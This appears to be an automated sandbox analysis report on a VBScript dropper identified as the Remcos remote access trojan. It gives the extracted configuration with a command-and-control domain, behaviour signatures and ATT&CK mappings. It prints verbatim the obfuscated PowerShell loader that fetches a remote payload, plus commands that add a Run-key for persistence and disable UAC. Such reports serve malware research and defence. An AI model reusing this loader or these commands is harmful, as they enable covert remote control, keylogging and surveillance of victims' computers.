Overview

overview

10

Static

static

1

a.vbs

windows7-x64

8

a.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-11-2024 06:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a.vbs

  • Size

    16KB

  • MD5

    e6c723d6a40150466aa011158c68e591

  • SHA1

    f18348ee740329c6cb706123b34151dde9197b50

  • SHA256

    969d4f51528c1a62de42fd8dfc0efaf09b1857426add53376a3e2db14456a173

  • SHA512

    c9c85c17c329267d8dbed3441baa63c85cbd0abbad858dfd86632de8cd97b461d8f36c4b4fbd126712cd2664ba1e6bd2eece30fb090b9ff462ac4c052b204256

  • SSDEEP

    384:X+7h2tykhjtUXkNaaYtydrEVql1UnqCrP0z9CW6fz83W4u8b:GUtbto31+rOqcnqCrMZuA3nb

Score
10/10
remcosremotehostdiscoveryevasionexecutionpersistencerattrojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

jwdtcx3kfb.duckdns.org:47392

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-JY1QRO

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 64 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1424
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cartograms Repaganisers Grejss Fiberkufferterne cnidoblast Ansgningsfristen Bromkaliummet #><#Sash Multielectrode Bruttoetagearealets pentaglottical #>$Erode72='Fashionabelt';function Erosely($Hedens){If ($host.DebuggerEnabled) {$Geolatry=4} for ($Catechus=$Geolatry;;$Catechus+=5){if(!$Hedens[$Catechus]) { break }$Moderne242+=$Hedens[$Catechus]}$Moderne242}function Sammenkogs($aimwre){ .($astichous) ($aimwre)}$Tamises=Erosely ',remn .atEA.ostGips.t.ikWPillEPhotbWhorcRe iLNudii.ecie Sp n esct';$Whitecup=Erosely 'NoveM ,ntoTreyzFagtiMucolOdorlTr kaFaar/';$Opklaringsstyrkes=Erosely 'R diTDogml Kr sBest1 ea2';$gennembruds='Glut[Flj.NPre E ftet Mo .GallSBag eAfgir Medv S,niM,ltCLustEBladPp.epoTenniTrusnDamatSomtMRiveaDeminInd.AWarsg HalEVskerHyst]Pres: Sk :UnicsAfseEBacac P ru Co Rt veISndrtFlosYHe,tpTes RS eao BagtUnnooArchC WaxoSkr LSka =Terr$TusiOHeltpyamsKKretL UslALea,RSkueiVa,tNAmmogF jlSSubdS NontBonnYBud RBoliK MereFaceS';$Whitecup+=Erosely '.edb5Mobu.Ruff0Konf Mrke(AutoW r niPap nUri dSubsoSubmw E,osVeks SubsNPeakTspor Semi1 Kni0 er.,bje0 Ur.;Star GejsW T miResonOver6Depu4Herl;Udf. KnskxFav 6 dsu4 Uds;Sup Krydr SpivC ta:Extr1.rae3 Uns1Fix .Velv0 Hyp)Hove BifiGTrafeProgcFagbksl no tau/Snar2Burg0Ud,a1 an0spa 0inte1 ab,0 Cla1Hy t NewsFMultisinurBudseLongfF geoFrikx eta/Impr1 Dvr3Occi1Tils.S,lv0';$Sarcomatosis193=Erosely 'SaliUOosps PoseElfir Ph - AtoaSalmG.tavEDecunDokut';$Viderebringelse=Erosely ' FerhDrabt Im,tVealpWebssV mp:Domy/tilk/,ntad Betr Evai Disv ReneLaka.FilogBeboo urbo Pr.gU,stl DaveRosf. H pcEgepo GanmJibs/S,stuIncoc To,?Gr,meCyulxRosepAw soUngrrRevet Au =KastdQuieoGravwStarnMa.tlFo koDet aKl ddPaak&AadsiGivtdSu,e=Rede1.lexpElev7BjlkKapriVSu fTpauljethnL ociQTr bH ForcFar Rfran-Pla -Sge.4 ,orrhemoS Kd BUnmuw ParnBhat5AnnaY DomLPhipk utrXSyndz .edETraa5DholyAstiuSmudZ ArczSka.8';$Stikpillers170=Erosely 'Cask>';$astichous=Erosely ' arii MazeAfteX';$Boretaarnene='Photoplaywright';$Scena='\Benzinmotorernes218.Gna';Sammenkogs (Erosely 'Arta$RascGAnisLStedO.lumbChapA Aerl.nva:AreomVskeuTrivs.ublhFrimrForuoL ejoWal MHj.miU.irN EryGFr m=ko,t$FusiEDekoNHe nVGu t:TigeADdssPskripC rnddrgsAO,seTT leaGene+J ke$ ohaSF utCDisteD.aeN myea');Sammenkogs (Erosely 'B ge$ SocGRefuL G,uOForlb,orga gygLWho :Hva,PNyphl ChoEUndeT oothEngaowhenR C lOIn nU spisafma= Pas$BrakVAfocIAssuDDomse EmpRPhotEStavB ttarArrhI ,eknZinkgAnnoEKla l OprsCrutE Fu,.DaglsAne pI dflRelaI SkgTAnae( Ph,$BelyS bnoT catIO hiK Cirp E tISjusl S llF ureOverR AgesR nd1Stil7Min 0 Den)');Sammenkogs (Erosely $gennembruds);$Viderebringelse=$Plethorous[0];$Catechusnosilicate=(Erosely 'Disl$O,emGCystLPoinOSev BFuckaTrinlAmob:Aff,psjleoPerfsanimIRhintSammiSikrOHorvNMid s An,L VinITopmsboe tJo vE GruRK ranBedie iss nt= otiNUd rEReacwB sl-sammoskrib,ikkJS.kteepi.c,osit.erv .chaS pmny .onsSt aTFormES enMarch.nond$Car,TForea BlaM kywi macSPreseM lls');Sammenkogs ($Catechusnosilicate);Sammenkogs (Erosely 'Ophr$phoePEligoFurzsSal i ScotAyi iSempoSprin.hyssOccal berisagasSammtArkaeHukkrSh.rnEgeneMurusupqu.EnliH SumeGanga GendSpeceDesir ligsTrou[ Fst$PhagSLibiaPolyrGigacLimsoAncim,abbaT rbt StooUncosCowli entsDe a1 Pol9Circ3C ri]Oste= Eun$DkssWHjerh Ur.iUngat H meModtcShowuMl ep');$Unskirted=Erosely 'Laby$ koPGraao Cens anaiNunatRykkiForsoRepanKon s Bill BraiUnvis Tint Anne rejr dsn rygeVicesTh s.PredDRampodiasw FodnSwinlKonso Yr aFascd TakFAcc iBor lAgele Sci(rhin$S,eoVB.yniDrf dSvove St.ropune ConbSemirErnriHoevn iblgGaw eResnlG lls RepeInte, O e$Pol,F NonlTedeaRiftsSa tkFa.oeWhi rErineKlipnTyndsk.meeLgprrKlov)';$Flaskerenser=$mushrooming;Sammenkogs (Erosely 'thor$NitrGEp klFrisosterBBarsaL gtLUdls:InelS Udia B,fM Su mUdyreAnkeN ng KUnunnEleny Ab,tRe.stSub E St,DPrevEF lk= Neu(CombTUnope MisSelevtPoly- upipBak,aComstTrouhPr,n Afp$ DolF H xlGrnlaLag SK,rsKPolyeOsteRt anEPro Nh,emSOmdmESelvRper )');while (!$Sammenknyttede) {Sammenkogs (Erosely 'Bolo$SpirgRenslR,nsoNonpb Rega TmrlPina:BursBLoegaLim tSlurhItery Dets Tenc .teaAsocp LaahHapaeAbibs Mic=C st$in.eEhka uAreorUnd oPearm MyrnDolmtColuelazyr') ;Sammenkogs $Unskirted;Sammenkogs (Erosely 'Un.rSFribt N.ka KamrHj mtA gu-HypeSRundlYdelES.rteEndapRver Cl.4');Sammenkogs (Erosely 'Stud$Cyang TralUnivORottBIn.rAPietlBaga:Un esHydrAMonom SpemBouleS mmNF ankMillNethnySurvt rict,ntieEfteDmo oEIgno= Rec(anertGorgERikosWaxbT o v- BlopUartaWormtAsf Ho al krl$retsFE,zoLMa sa TaksPeliKVerdE Uger ErhEE stNH,loS PreE IjorSvr )') ;Sammenkogs (Erosely ' Ol $ forgGan l hoOO.igB beaAantiLMapp:PullFmidteTyenM ankt spaE Stan ilrApunnaVaerR ieps Camf larDSineshearePretlskilsExpadArk.aKattgAd mEEry.NMark5 Par1Gill=L nd$GuarG Fral.fseOin fbScraaO,deLResi: HenFAgatESmutiOestN jlesConcC.iochStttMun oEHolac.nthkZedsE MauRSlibE rosPara+Fugl+Budd% P a$Con pTrafL upeE unTWitchPolyoBindRMercO FaluSmukS Cau.Sa tc ,tooDispUS idnPibet') ;$Viderebringelse=$Plethorous[$Femtenaarsfdselsdagen51]}$Sabbatic=334089;$Afkog=31095;Sammenkogs (Erosely 'K.es$ IrrgIn oL BesOHe,tBKomoaAfmrLBorg:un rgHjemHFemua K orkr,trVindI SpaeG aiS.osy Ov.r=Soci SupgUnivEB batKvad-F dsC Rito fl NHe nTMiljE QuaNAdreT Byl Disc$BiosF eadLSnotaIn uS VerkL veESchoR .oleoverNKeyssrecieC.llR');Sammenkogs (Erosely 'Se.r$Inddg Klel Denocubeb Reda,yvulBegr:OccuSTyk.tPrisuSkuld.inosec imBl nu KersTa,reGrapnGas. Vri =Woad Qui[Dev SRetry olss Au tPuriecoapm M a.SiksCTo.doPickn .ulvCalleSy drforvtHalo]Tote: Det:m scFLa cr kedoFilam FjoB ifaHattsposeePin,6 De,4DykkS ductLi,erTek iSpinn bongLano( Man$DunaG T ghDiviaD lfrImp,rkendiStene W,esStag)');Sammenkogs (Erosely 'Sapr$ HaeGVi elUn xO addbE kyAUn.iLtvan:EurotBoraOUnmecPatro Cykl Ha.oNonsG Fi IBereeFedtS End brud=Stra Gar [ artSUnply edeSFlotTV,ndEGradMBolu. VipTPi eEStrmXPerstSlag.M tee tdn izzcc,ttOMultDArc i U enCadugArbu]Areo:Daga:chitaH,nsSHypoc RosIUnv iGrn..Kan Gsa oE NikTSid sAccot OfrRenliiDi knDivig Fej(I.gt$Brofsra,gTRetru ,uqDOccuSBredm,geluRdehsTegle ogenAfre)');Sammenkogs (Erosely 'Hunh$Laesg cenlFa eoTargBDemeAForslLati: Gi R SkieLat,PEvo,ULandr.fteiGeniF Rk IAtomc Ho,adansTPropiSpiooFjo NMism7Ti e9 Gal=Ager$AangtKlumOS mmCTo uO ,eiLLahlodiskGEx.uI Gr e RevS eb.T.nds HoruW,reBVectSSemiT GuirRescI ChanMetagHe n( Eks$ StrsPly a FrabTrolBDuppaDucstHj oi,omecGuld,Idol$ PelaTragFBr.dKOveroUntrG dep)');Sammenkogs $Repurification79;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3020
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Cartograms Repaganisers Grejss Fiberkufferterne cnidoblast Ansgningsfristen Bromkaliummet #><#Sash Multielectrode Bruttoetagearealets pentaglottical #>$Erode72='Fashionabelt';function Erosely($Hedens){If ($host.DebuggerEnabled) {$Geolatry=4} for ($Catechus=$Geolatry;;$Catechus+=5){if(!$Hedens[$Catechus]) { break }$Moderne242+=$Hedens[$Catechus]}$Moderne242}function Sammenkogs($aimwre){ .($astichous) ($aimwre)}$Tamises=Erosely ',remn .atEA.ostGips.t.ikWPillEPhotbWhorcRe iLNudii.ecie Sp n esct';$Whitecup=Erosely 'NoveM ,ntoTreyzFagtiMucolOdorlTr kaFaar/';$Opklaringsstyrkes=Erosely 'R diTDogml Kr sBest1 ea2';$gennembruds='Glut[Flj.NPre E ftet Mo .GallSBag eAfgir Medv S,niM,ltCLustEBladPp.epoTenniTrusnDamatSomtMRiveaDeminInd.AWarsg HalEVskerHyst]Pres: Sk :UnicsAfseEBacac P ru Co Rt veISndrtFlosYHe,tpTes RS eao BagtUnnooArchC WaxoSkr LSka =Terr$TusiOHeltpyamsKKretL UslALea,RSkueiVa,tNAmmogF jlSSubdS NontBonnYBud RBoliK MereFaceS';$Whitecup+=Erosely '.edb5Mobu.Ruff0Konf Mrke(AutoW r niPap nUri dSubsoSubmw E,osVeks SubsNPeakTspor Semi1 Kni0 er.,bje0 Ur.;Star GejsW T miResonOver6Depu4Herl;Udf. KnskxFav 6 dsu4 Uds;Sup Krydr SpivC ta:Extr1.rae3 Uns1Fix .Velv0 Hyp)Hove BifiGTrafeProgcFagbksl no tau/Snar2Burg0Ud,a1 an0spa 0inte1 ab,0 Cla1Hy t NewsFMultisinurBudseLongfF geoFrikx eta/Impr1 Dvr3Occi1Tils.S,lv0';$Sarcomatosis193=Erosely 'SaliUOosps PoseElfir Ph - AtoaSalmG.tavEDecunDokut';$Viderebringelse=Erosely ' FerhDrabt Im,tVealpWebssV mp:Domy/tilk/,ntad Betr Evai Disv ReneLaka.FilogBeboo urbo Pr.gU,stl DaveRosf. H pcEgepo GanmJibs/S,stuIncoc To,?Gr,meCyulxRosepAw soUngrrRevet Au =KastdQuieoGravwStarnMa.tlFo koDet aKl ddPaak&AadsiGivtdSu,e=Rede1.lexpElev7BjlkKapriVSu fTpauljethnL ociQTr bH ForcFar Rfran-Pla -Sge.4 ,orrhemoS Kd BUnmuw ParnBhat5AnnaY DomLPhipk utrXSyndz .edETraa5DholyAstiuSmudZ ArczSka.8';$Stikpillers170=Erosely 'Cask>';$astichous=Erosely ' arii MazeAfteX';$Boretaarnene='Photoplaywright';$Scena='\Benzinmotorernes218.Gna';Sammenkogs (Erosely 'Arta$RascGAnisLStedO.lumbChapA Aerl.nva:AreomVskeuTrivs.ublhFrimrForuoL ejoWal MHj.miU.irN EryGFr m=ko,t$FusiEDekoNHe nVGu t:TigeADdssPskripC rnddrgsAO,seTT leaGene+J ke$ ohaSF utCDisteD.aeN myea');Sammenkogs (Erosely 'B ge$ SocGRefuL G,uOForlb,orga gygLWho :Hva,PNyphl ChoEUndeT oothEngaowhenR C lOIn nU spisafma= Pas$BrakVAfocIAssuDDomse EmpRPhotEStavB ttarArrhI ,eknZinkgAnnoEKla l OprsCrutE Fu,.DaglsAne pI dflRelaI SkgTAnae( Ph,$BelyS bnoT catIO hiK Cirp E tISjusl S llF ureOverR AgesR nd1Stil7Min 0 Den)');Sammenkogs (Erosely $gennembruds);$Viderebringelse=$Plethorous[0];$Catechusnosilicate=(Erosely 'Disl$O,emGCystLPoinOSev BFuckaTrinlAmob:Aff,psjleoPerfsanimIRhintSammiSikrOHorvNMid s An,L VinITopmsboe tJo vE GruRK ranBedie iss nt= otiNUd rEReacwB sl-sammoskrib,ikkJS.kteepi.c,osit.erv .chaS pmny .onsSt aTFormES enMarch.nond$Car,TForea BlaM kywi macSPreseM lls');Sammenkogs ($Catechusnosilicate);Sammenkogs (Erosely 'Ophr$phoePEligoFurzsSal i ScotAyi iSempoSprin.hyssOccal berisagasSammtArkaeHukkrSh.rnEgeneMurusupqu.EnliH SumeGanga GendSpeceDesir ligsTrou[ Fst$PhagSLibiaPolyrGigacLimsoAncim,abbaT rbt StooUncosCowli entsDe a1 Pol9Circ3C ri]Oste= Eun$DkssWHjerh Ur.iUngat H meModtcShowuMl ep');$Unskirted=Erosely 'Laby$ koPGraao Cens anaiNunatRykkiForsoRepanKon s Bill BraiUnvis Tint Anne rejr dsn rygeVicesTh s.PredDRampodiasw FodnSwinlKonso Yr aFascd TakFAcc iBor lAgele Sci(rhin$S,eoVB.yniDrf dSvove St.ropune ConbSemirErnriHoevn iblgGaw eResnlG lls RepeInte, O e$Pol,F NonlTedeaRiftsSa tkFa.oeWhi rErineKlipnTyndsk.meeLgprrKlov)';$Flaskerenser=$mushrooming;Sammenkogs (Erosely 'thor$NitrGEp klFrisosterBBarsaL gtLUdls:InelS Udia B,fM Su mUdyreAnkeN ng KUnunnEleny Ab,tRe.stSub E St,DPrevEF lk= Neu(CombTUnope MisSelevtPoly- upipBak,aComstTrouhPr,n Afp$ DolF H xlGrnlaLag SK,rsKPolyeOsteRt anEPro Nh,emSOmdmESelvRper )');while (!$Sammenknyttede) {Sammenkogs (Erosely 'Bolo$SpirgRenslR,nsoNonpb Rega TmrlPina:BursBLoegaLim tSlurhItery Dets Tenc .teaAsocp LaahHapaeAbibs Mic=C st$in.eEhka uAreorUnd oPearm MyrnDolmtColuelazyr') ;Sammenkogs $Unskirted;Sammenkogs (Erosely 'Un.rSFribt N.ka KamrHj mtA gu-HypeSRundlYdelES.rteEndapRver Cl.4');Sammenkogs (Erosely 'Stud$Cyang TralUnivORottBIn.rAPietlBaga:Un esHydrAMonom SpemBouleS mmNF ankMillNethnySurvt rict,ntieEfteDmo oEIgno= Rec(anertGorgERikosWaxbT o v- BlopUartaWormtAsf Ho al krl$retsFE,zoLMa sa TaksPeliKVerdE Uger ErhEE stNH,loS PreE IjorSvr )') ;Sammenkogs (Erosely ' Ol $ forgGan l hoOO.igB beaAantiLMapp:PullFmidteTyenM ankt spaE Stan ilrApunnaVaerR ieps Camf larDSineshearePretlskilsExpadArk.aKattgAd mEEry.NMark5 Par1Gill=L nd$GuarG Fral.fseOin fbScraaO,deLResi: HenFAgatESmutiOestN jlesConcC.iochStttMun oEHolac.nthkZedsE MauRSlibE rosPara+Fugl+Budd% P a$Con pTrafL upeE unTWitchPolyoBindRMercO FaluSmukS Cau.Sa tc ,tooDispUS idnPibet') ;$Viderebringelse=$Plethorous[$Femtenaarsfdselsdagen51]}$Sabbatic=334089;$Afkog=31095;Sammenkogs (Erosely 'K.es$ IrrgIn oL BesOHe,tBKomoaAfmrLBorg:un rgHjemHFemua K orkr,trVindI SpaeG aiS.osy Ov.r=Soci SupgUnivEB batKvad-F dsC Rito fl NHe nTMiljE QuaNAdreT Byl Disc$BiosF eadLSnotaIn uS VerkL veESchoR .oleoverNKeyssrecieC.llR');Sammenkogs (Erosely 'Se.r$Inddg Klel Denocubeb Reda,yvulBegr:OccuSTyk.tPrisuSkuld.inosec imBl nu KersTa,reGrapnGas. Vri =Woad Qui[Dev SRetry olss Au tPuriecoapm M a.SiksCTo.doPickn .ulvCalleSy drforvtHalo]Tote: Det:m scFLa cr kedoFilam FjoB ifaHattsposeePin,6 De,4DykkS ductLi,erTek iSpinn bongLano( Man$DunaG T ghDiviaD lfrImp,rkendiStene W,esStag)');Sammenkogs (Erosely 'Sapr$ HaeGVi elUn xO addbE kyAUn.iLtvan:EurotBoraOUnmecPatro Cykl Ha.oNonsG Fi IBereeFedtS End brud=Stra Gar [ artSUnply edeSFlotTV,ndEGradMBolu. VipTPi eEStrmXPerstSlag.M tee tdn izzcc,ttOMultDArc i U enCadugArbu]Areo:Daga:chitaH,nsSHypoc RosIUnv iGrn..Kan Gsa oE NikTSid sAccot OfrRenliiDi knDivig Fej(I.gt$Brofsra,gTRetru ,uqDOccuSBredm,geluRdehsTegle ogenAfre)');Sammenkogs (Erosely 'Hunh$Laesg cenlFa eoTargBDemeAForslLati: Gi R SkieLat,PEvo,ULandr.fteiGeniF Rk IAtomc Ho,adansTPropiSpiooFjo NMism7Ti e9 Gal=Ager$AangtKlumOS mmCTo uO ,eiLLahlodiskGEx.uI Gr e RevS eb.T.nds HoruW,reBVectSSemiT GuirRescI ChanMetagHe n( Eks$ StrsPly a FrabTrolBDuppaDucstHj oi,omecGuld,Idol$ PelaTragFBr.dKOveroUntrG dep)');Sammenkogs $Repurification79;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3572
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1584
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Aabeskyttelseslinien% -windowstyle 1 $Banegaardenes=(gp -Path 'HKCU:\Software\Crinums\').Checkkontoens;%Aabeskyttelseslinien% ($Banegaardenes)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3608
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Aabeskyttelseslinien% -windowstyle 1 $Banegaardenes=(gp -Path 'HKCU:\Software\Crinums\').Checkkontoens;%Aabeskyttelseslinien% ($Banegaardenes)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:3620
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3040
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:3120

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

1
T1548

Bypass User Account Control

1
T1548.002

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

1
T1548

Bypass User Account Control

1
T1548.002

Impair Defenses

1
T1562

Disable or Modify Tools

1
T1562.001

Modify Registry

3
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

System Location Discovery

1
T1614

System Language Discovery

1
T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1
T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat
    Filesize

    144B

    MD5

    01d16bf4aa0947477c914531bbee7612

    SHA1

    7cc3df91e5c7b5cc8a61cc49b8ba72f5233b672f

    SHA256

    ad8d9d31275aff49e38964dc71a578e0d0469e757983f6284816ffc844a0596f

    SHA512

    cc794323fc48ceae2410a53b5d72b711d73e00f861b9797d3df8f06767900e1c4fc61840ba82a75db64db0844e19241df80cf4a4f0e2b7208d4efb05343921c5

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    d4ff23c124ae23955d34ae2a7306099a

    SHA1

    b814e3331a09a27acfcd114d0c8fcb07957940a3

    SHA256

    1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

    SHA512

    f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_co2vpd54.i02.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Benzinmotorernes218.Gna
    Filesize

    475KB

    MD5

    295c44d32a59cd7721867d53a2e08e74

    SHA1

    b8359e0cdbf75e98d9e2abc64007219386d71c13

    SHA256

    bd1cf04c594f0a47c0945d215d5d04e8c64555857673e4dd3e7f2d1ae6d8627b

    SHA512

    fe894a5b177a8d69fc4bfe96e627015cc0da548b564bbe46eeed6149306025c93a596fa014328067bdd74f742f7251659027c13ec98787758cca017f70ed9c1b

    Download Submit

  • memory/1584-62-0x0000000001200000-0x0000000002454000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/3020-15-0x00007FFD417E0000-0x00007FFD422A1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3020-19-0x00007FFD417E0000-0x00007FFD422A1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3020-21-0x00007FFD417E0000-0x00007FFD422A1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3020-24-0x00007FFD417E0000-0x00007FFD422A1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3020-18-0x00007FFD417E3000-0x00007FFD417E5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3020-16-0x00007FFD417E0000-0x00007FFD422A1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3020-5-0x000001CA66E00000-0x000001CA66E22000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3020-4-0x00007FFD417E3000-0x00007FFD417E5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3572-28-0x0000000005DB0000-0x0000000005E16000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3572-45-0x0000000007870000-0x0000000007906000-memory.dmp

    Filesize

    600KB

    Download

  • memory/3572-29-0x0000000005E20000-0x0000000005E86000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3572-41-0x0000000006550000-0x000000000656E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/3572-42-0x00000000065A0000-0x00000000065EC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/3572-43-0x0000000007EF0000-0x000000000856A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/3572-44-0x0000000006AF0000-0x0000000006B0A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/3572-39-0x0000000005ED0000-0x0000000006224000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/3572-46-0x0000000007760000-0x0000000007782000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3572-47-0x0000000008570000-0x0000000008B14000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/3572-27-0x0000000005580000-0x00000000055A2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3572-49-0x0000000008B20000-0x000000000AC74000-memory.dmp

    Filesize

    33.3MB

    Download

  • memory/3572-26-0x0000000005780000-0x0000000005DA8000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/3572-25-0x0000000002C50000-0x0000000002C86000-memory.dmp

    Filesize

    216KB

    Download